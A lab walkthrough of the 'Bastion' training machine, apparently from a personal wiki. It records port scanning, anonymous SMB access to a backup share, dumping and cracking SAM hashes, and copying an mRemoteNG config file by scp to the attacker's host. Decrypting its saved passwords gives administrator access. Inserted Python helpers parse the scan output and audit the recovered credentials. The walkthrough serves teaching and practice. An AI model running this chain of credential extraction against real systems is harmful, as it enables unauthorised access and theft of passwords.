Bastion

From Luniwiki


Bastion01.png

Ports scan

u505@kali:~/HTB/Machines/Bastion$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.134 --rate=1000
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-02-22 15:31:23 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 47001/tcp on 10.10.10.134
Discovered open port 135/tcp on 10.10.10.134
Discovered open port 49668/tcp on 10.10.10.134
Discovered open port 49670/tcp on 10.10.10.134
Discovered open port 49667/tcp on 10.10.10.134
Discovered open port 49666/tcp on 10.10.10.134
Discovered open port 49664/tcp on 10.10.10.134
Discovered open port 139/tcp on 10.10.10.134
Discovered open port 22/tcp on 10.10.10.134
Discovered open port 49669/tcp on 10.10.10.134
Discovered open port 49665/tcp on 10.10.10.134
Discovered open port 5985/tcp on 10.10.10.134
Discovered open port 445/tcp on 10.10.10.134
u505@kali:~/HTB/Machines/Bastion$ nmap -sC -sV 10.10.10.134
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-22 10:31 EST
Nmap scan report for bastion.htb (10.10.10.134)
Host is up (0.039s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE      VERSION
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -19m01s, deviation: 34m37s, median: 57s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-02-22T16:32:36+01:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-02-22T15:32:38
|_  start_date: 2020-02-22T15:15:33

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.12 seconds

Nmap on the remaining ports discovered by masscan

u505@kali:~/HTB/Machines/Bastion$ nmap -sC -sV -p 5985,49666,49669,47001,49670,49664,49668,49665,49667 10.10.10.134
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-22 10:41 EST
Nmap scan report for bastion.htb (10.10.10.134)
Host is up (0.039s latency).

PORT      STATE SERVICE VERSION
5985/tcp  open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc   Microsoft Windows RPC
49665/tcp open  msrpc   Microsoft Windows RPC
49666/tcp open  msrpc   Microsoft Windows RPC
49667/tcp open  msrpc   Microsoft Windows RPC
49668/tcp open  msrpc   Microsoft Windows RPC
49669/tcp open  msrpc   Microsoft Windows RPC
49670/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.71 seconds
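The two-pass scan above (full-range masscan, then nmap only on the ports the default nmap run did not cover) is easy to get wrong by hand when the port list is long. The helper below is an added example, not part of the original write-up: it parses masscan's "Discovered open port" lines, subtracts the ports the first nmap pass already reported, and emits the leftover ports in nmap -p syntax with consecutive ports collapsed into ranges. The embedded masscan output is reconstructed from the scan shown above.

```python
import re

# Constructed from the masscan output shown above: the same host and port lines.
MASSCAN_OUTPUT = """\
Discovered open port 47001/tcp on 10.10.10.134
Discovered open port 135/tcp on 10.10.10.134
Discovered open port 49668/tcp on 10.10.10.134
Discovered open port 49670/tcp on 10.10.10.134
Discovered open port 49667/tcp on 10.10.10.134
Discovered open port 49666/tcp on 10.10.10.134
Discovered open port 49664/tcp on 10.10.10.134
Discovered open port 139/tcp on 10.10.10.134
Discovered open port 22/tcp on 10.10.10.134
Discovered open port 49669/tcp on 10.10.10.134
Discovered open port 49665/tcp on 10.10.10.134
Discovered open port 5985/tcp on 10.10.10.134
Discovered open port 445/tcp on 10.10.10.134
"""

# One masscan result line: "Discovered open port <port>/<proto> on <host>"
LINE_RE = re.compile(r"Discovered open port (\d+)/(tcp|udp) on (\S+)")

def parse_masscan(text):
    """Map each host to the set of open ports masscan reported, per protocol."""
    hosts = {}
    for m in LINE_RE.finditer(text):
        port, proto, host = int(m.group(1)), m.group(2), m.group(3)
        hosts.setdefault(host, {"tcp": set(), "udp": set()})[proto].add(port)
    return hosts

def compact_ranges(ports):
    """Collapse a sorted list of ports into nmap -p syntax: [1, 2, 3, 7] -> '1-3,7'."""
    runs = []
    for p in ports:
        if runs and runs[-1][1] == p - 1:
            runs[-1][1] = p          # extend the current consecutive run
        else:
            runs.append([p, p])      # start a new run
    return ",".join(str(a) if a == b else f"{a}-{b}" for a, b in runs)

def remaining_ports(hosts, host, already_scanned, proto="tcp"):
    """Ports masscan found on `host` that the first nmap pass did not cover, as an nmap -p argument."""
    found = hosts.get(host, {}).get(proto, set())
    return compact_ranges(sorted(found - set(already_scanned)))

if __name__ == "__main__":
    hosts = parse_masscan(MASSCAN_OUTPUT)
    # The default nmap run above already covered 22, 135, 139 and 445.
    print("nmap -sC -sV -p", remaining_ports(hosts, "10.10.10.134", [22, 135, 139, 445]), "10.10.10.134")
```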

Port 445

Nmap share discovery

Nmap does not discover any shares.

u505@kali:~/HTB/Machines/Bastion$ nmap -p 445 --script=smb-enum-shares 10.10.10.134
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-22 10:36 EST
Nmap scan report for bastion.htb (10.10.10.134)
Host is up (0.039s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 15.69 seconds

Nullinux

This script doesn't provide any useful information either.

u505@kali:~/HTB/Machines/Bastion$ python3 /opt/utils/nullinux/nullinux.py -v bastion.htb

Starting nullinux v5.4.1 | 02-22-2020 10:38


[*] Enumerating Shares for: bastion.htb
    Shares                  Comments
   -------------------------------------------
[-] No Shares Detected
[*] Enumerating Domain Information for: bastion.htb
[-] Could not attain Domain SID
[*] Enumerating querydispinfo for: bastion.htb
[*] Enumerating enumdomusers for: bastion.htb
[*] Enumerating LSA for: bastion.htb
[*] Performing RID Cycling for: bastion.htb
[-] RID Failed: Could not attain Domain SID
[*] Testing bastion.htb for Known Users
[*] Enumerating Group Memberships for: bastion.htb
[*] 0 unique user(s) identified

smbmap

smbmap provides more information.

u505@kali:~/HTB/Machines/Bastion$ smbmap -u anonymous -H 10.10.10.134
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.134...
[+] IP: 10.10.10.134:445        Name: bastion.htb                               
        Disk                                                    Permissions    Comment
        ----                                                    -----------    -------
        ADMIN$                                                  NO ACCESS      Remote Admin
        Backups                                                 READ, WRITE
        [!] Unable to remove test directory at \\10.10.10.134\BackupsvAmwsJkyfR, please remove manually
        C$                                                      NO ACCESS      Default share
        .
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    InitShutdown
        fr--r--r--                4 Sun Dec 31 19:03:58 1600    lsass
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    ntsvcs
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    scerpc
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-2dc-0
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    epmapper
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-1c8-0
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    LSM_API_service
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    eventlog
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-35c-0
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    atsvc
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-3b0-0
        fr--r--r--                4 Sun Dec 31 19:03:58 1600    wkssvc
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    spoolss
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-5e0-0
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    trkwks
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    W32TIME_ALT
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    openssh-ssh-agent
        fr--r--r--                4 Sun Dec 31 19:03:58 1600    srvsvc
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    vgauth-service
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-590-0
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-24c-0
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-244-0
        IPC$                                                    READ ONLY      Remote IPC

smbclient

u505@kali:~/HTB/Machines/Bastion$ smbclient //bastion/Backups
Enter WORKGROUP\u505's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Feb 22 10:43:14 2020
  ..                                  D        0  Sat Feb 22 10:43:14 2020
  nmap-test-file                      A      260  Sat Feb 22 10:37:21 2020
  note.txt                           AR      116  Tue Apr 16 06:10:09 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 07:43:08 2019
  vAmwsJkyfR                          D        0  Sat Feb 22 10:43:14 2020
  WindowsImageBackup                  D        0  Fri Feb 22 07:44:02 2019

		7735807 blocks of size 4096. 2763043 blocks available
smb: \> get note.txt
getting file \note.txt of size 116 as note.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)

The note tells us not to download the full backup, so that we don't DoS ourselves.

u505@kali:~/HTB/Machines/Bastion$ cat note.txt

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

Mount the share

u505@kali:~/HTB/Machines/Bastion$ mkdir mountpoint
u505@kali:~/HTB/Machines/Bastion$ sudo mount -t cifs -o username=anonymous //bastion/Backups mountpoint
Password for anonymous@//bastion/Backups:

Backup of a computer

A full Windows image backup of a computer (L4mpje-PC) is found on the share.

u505@kali:~/HTB/Machines/Bastion/mountpoint/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351$ ls -ltr
total 5330560
-rwxr-xr-x 1 root root   37761024 Feb 22  2019 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
-rwxr-xr-x 1 root root 5418299392 Feb 22  2019 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
-rwxr-xr-x 1 root root    2374620 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
-rwxr-xr-x 1 root root       2894 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
-rwxr-xr-x 1 root root       1488 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
-rwxr-xr-x 1 root root       3988 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
-rwxr-xr-x 1 root root       7110 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
-rwxr-xr-x 1 root root       3844 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
-rwxr-xr-x 1 root root       1484 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
-rwxr-xr-x 1 root root       6542 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
-rwxr-xr-x 1 root root       1078 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
-rwxr-xr-x 1 root root       1186 Feb 22  2019 BackupSpecs.xml
-rwxr-xr-x 1 root root       8930 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml

Mount the VHD file

u505@kali:~/HTB/Machines/Bastion$ mkdir -p smb/vhd
u505@kali:~/HTB/Machines/Bastion/mountpoint/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351$ guestmount --add "/home/u505/HTB/Machines/Bastion/mountpoint/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd" --inspector --ro /home/u505/HTB/Machines/Bastion/smb/vhd -v
u505@kali:~/HTB/Machines/Bastion$ df -h /opt/HTB/Machines/Bastion/smb/vhd
Filesystem      Size  Used Avail Use% Mounted on
/dev/fuse        15G  7.4G  7.6G  50% /opt/HTB/Machines/Bastion/smb/vhd

Alternative (and faster) way to mount the VHD file

u505@kali:~/HTB/Machines/Bastion$ sudo modprobe nbd
[sudo] password for u505:
u505@kali:~/HTB/Machines/Bastion$ sudo qemu-nbd -r -c /dev/nbd0 "/home/u505/HTB/Machines/Bastion/mountpoint/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd"
u505@kali:~/HTB/Machines/Bastion$ sudo mount -r /dev/nbd0p1 smb/vhd/
u505@kali:~/HTB/Machines/Bastion$ df -h /opt/HTB/Machines/Bastion/smb/vhd
Filesystem      Size  Used Avail Use% Mounted on
/dev/nbd0p1      15G  7.4G  7.6G  50% /opt/HTB/Machines/Bastion/smb/vhd

Copy the SAM from the backup

u505@kali:~/HTB/Machines/Bastion/smb/vhd/Windows/System32/config$ cp SAM SYSTEM ../../../../
u505@kali:~/HTB/Machines/Bastion/smb$ samdump2 SYSTEM SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
u505@kali:~/HTB/Machines/Bastion/smb$ samdump2 SYSTEM SAM > hash.txt
u505@kali:~/HTB/Machines/Bastion/smb$ hashcat -m 1000 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
u505@kali:~/HTB/Machines/Bastion/smb$ hashcat -m 1000 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
31d6cfe0d16ae931b73c59d7e0c089c0:
26112010952d963c8dc4217daec986d9:bureaulampje
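hashcat --show prints only hash:plaintext, so the usernames from the samdump2 output have to be joined back in by hand. The script below is an added example (not from the original write-up) that does that join and turns it into a small password-audit report: it parses the pwdump lines including samdump2's *disabled* marker, maps each NT hash to its cracked plaintext, and flags blank passwords (the NT hash of the empty string), wordlist passwords and any account still carrying an LM hash. The embedded input is reconstructed from the samdump2 and hashcat output shown above.

```python
# Constructed from the samdump2 and hashcat --show output shown above.
PWDUMP = """\
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
"""
HASHCAT_SHOW = """\
31d6cfe0d16ae931b73c59d7e0c089c0:
26112010952d963c8dc4217daec986d9:bureaulampje
"""
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "": no LM hash stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "": blank password

def parse_pwdump(text):
    """Parse pwdump lines (user:rid:lm:nt:::), keeping samdump2's *disabled* marker."""
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        disabled = line.startswith("*disabled*")
        if disabled:
            line = line[len("*disabled*"):].strip()
        user, rid, lm, nt = line.split(":")[:4]
        accounts.append({"user": user, "rid": int(rid), "lm": lm.lower(),
                         "nt": nt.lower(), "disabled": disabled})
    return accounts

def parse_hashcat_show(text):
    """Map each hash in 'hashcat --show' output (hash:plaintext) to its plaintext."""
    return {digest.lower(): plaintext for digest, _, plaintext in
            (l.strip().partition(":") for l in text.splitlines() if ":" in l)}

def audit_sam(pwdump_text, show_text):
    """Join the two outputs back together and flag what a password audit cares about."""
    cracked = parse_hashcat_show(show_text)
    report = []
    for acct in parse_pwdump(pwdump_text):
        findings = []
        if acct["nt"] == EMPTY_NT:
            findings.append("blank password")
        elif acct["nt"] in cracked:
            findings.append("password in wordlist")
        if acct["lm"] != EMPTY_LM:
            findings.append("LM hash stored")
        report.append({"user": acct["user"], "rid": acct["rid"], "disabled": acct["disabled"],
                       "findings": findings, "password": cracked.get(acct["nt"])})
    return report
```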

Unmount the VHD drive

u505@kali:~/HTB/Machines/Bastion$ sudo umount /opt/HTB/Machines/Bastion/smb/vhd

If the VHD image was mounted with qemu-nbd, disconnect it

u505@kali:~/HTB/Machines/Bastion$ sudo qemu-nbd -d /dev/nbd0
/dev/nbd0 disconnected

Unmount the share

u505@kali:~/HTB/Machines/SwagShop$ sudo umount /opt/HTB/Machines/Bastion/mountpoint

User flag

u505@kali:~/HTB/Machines/Bastion/smb$ ssh L4mpje@bastion.htb
The authenticity of host 'bastion.htb (10.10.10.134)' can't be established.
ECDSA key fingerprint is SHA256:ILc1g9UC/7j/5b+vXeQ7TIaXLFddAbttU86ZeiM/bNY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'bastion.htb,10.10.10.134' (ECDSA) to the list of known hosts.
L4mpje@bastion.htb's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>cd Desktop
l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
<USER_FLAG>

mRemoteNG credentials

mRemoteNG stores passwords in its configuration file in the user profile. There is a master password, but it is not used to encrypt the passwords,...

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>scp confCons.xml u505@10.10.14.6:/home/u505/HTB/Machines/Bastion/confCons.xml
The authenticity of host '10.10.14.6 (10.10.14.6)' can't be established.
ECDSA key fingerprint is SHA256:ul2yK4MycGHJVeGXwtf6Uts1TELbRlDwqXUxP/9K9m4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.14.6' (ECDSA) to the list of known hosts.
u505@10.10.14.6's password:
confCons.xml                                                                      100% 6316   132.2KB/s   00:00

Bastion02.png

In the configuration file, there are two sets of credentials: Administrator and the well-known L4mpje.

u505@kali:~/HTB/Machines/Bastion$ python /opt/utils/mRemoteNG-Decrypt/mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2
u505@kali:~/HTB/Machines/Bastion$ python /opt/utils/mRemoteNG-Decrypt/mremoteng_decrypt.py -s "yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB"
Password: bureaulampje
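The lesson of this section is that a confCons.xml in a user profile is a credential store, and a defender wants to know which connections in it carry saved passwords and how the file is protected. The script below is an added example, not part of the original write-up or of mRemoteNG: it walks the Node elements of a confCons.xml and lists every connection with a non-empty Password attribute, and reads the encryption settings recorded on the root element. The sample XML is constructed to follow the mRemoteNG layout (root Connections element with EncryptionEngine, BlockCipherMode, KdfIterations, FullFileEncryption and Protected attributes; Node elements with Name, Username, Hostname, Password, Protocol); the hostnames and blobs in it are placeholders.

```python
import xml.etree.ElementTree as ET

# Constructed stand-in for a confCons.xml following the mRemoteNG layout.
# Hostnames and the base64 blobs are placeholders, not values from a real file.
SAMPLE_CONFCONS = """<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false"
    EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false"
    Protected="PLACEHOLDER_PROTECTED_BLOB" ConfVersion="2.6">
  <Node Name="DC" Type="Connection" Username="Administrator" Domain=""
      Password="PLACEHOLDER_BLOB_1" Hostname="host-a.example" Protocol="RDP" />
  <Node Name="L4mpje-PC" Type="Connection" Username="L4mpje" Domain=""
      Password="PLACEHOLDER_BLOB_2" Hostname="host-b.example" Protocol="RDP" />
  <Node Name="jump" Type="Connection" Username="" Domain="" Password=""
      Hostname="host-c.example" Protocol="SSH2" />
</mrng:Connections>
"""

def _local(tag):
    """Strip an XML namespace: '{http://mremoteng.org}Connections' -> 'Connections'."""
    return tag.rsplit("}", 1)[-1]

def file_settings(xml_text):
    """Encryption settings recorded on the root element of the connections file."""
    root = ET.fromstring(xml_text)
    return {
        "full_file_encryption": root.get("FullFileEncryption", "false").lower() == "true",
        "engine": root.get("EncryptionEngine"),
        "mode": root.get("BlockCipherMode"),
        "kdf_iterations": int(root.get("KdfIterations", "0")),
    }

def stored_credentials(xml_text):
    """Every connection entry that carries a stored (encrypted) password."""
    root = ET.fromstring(xml_text)
    found = []
    for node in root.iter():
        if _local(node.tag) != "Node" or node.get("Type") != "Connection":
            continue
        if node.get("Password"):          # empty attribute means no password saved
            found.append({"name": node.get("Name"), "user": node.get("Username"),
                          "host": node.get("Hostname"), "protocol": node.get("Protocol")})
    return found
```

With FullFileEncryption false, only the Password attributes are encrypted and the rest of the file (hosts, usernames, protocols) is readable as plain XML, which is what makes the inventory above possible without any key.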

Root Flag

u505@kali:~/HTB/Machines/Bastion$ ssh administrator@bastion.htb
administrator@bastion.htb's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

administrator@BASTION C:\Users\Administrator>whoami
bastion\administrator

administrator@BASTION C:\Users\Administrator>type Desktop\root.txt
<ROOT_FLAG>

Daniel Simao 10:28, 22 February 2020 (EST)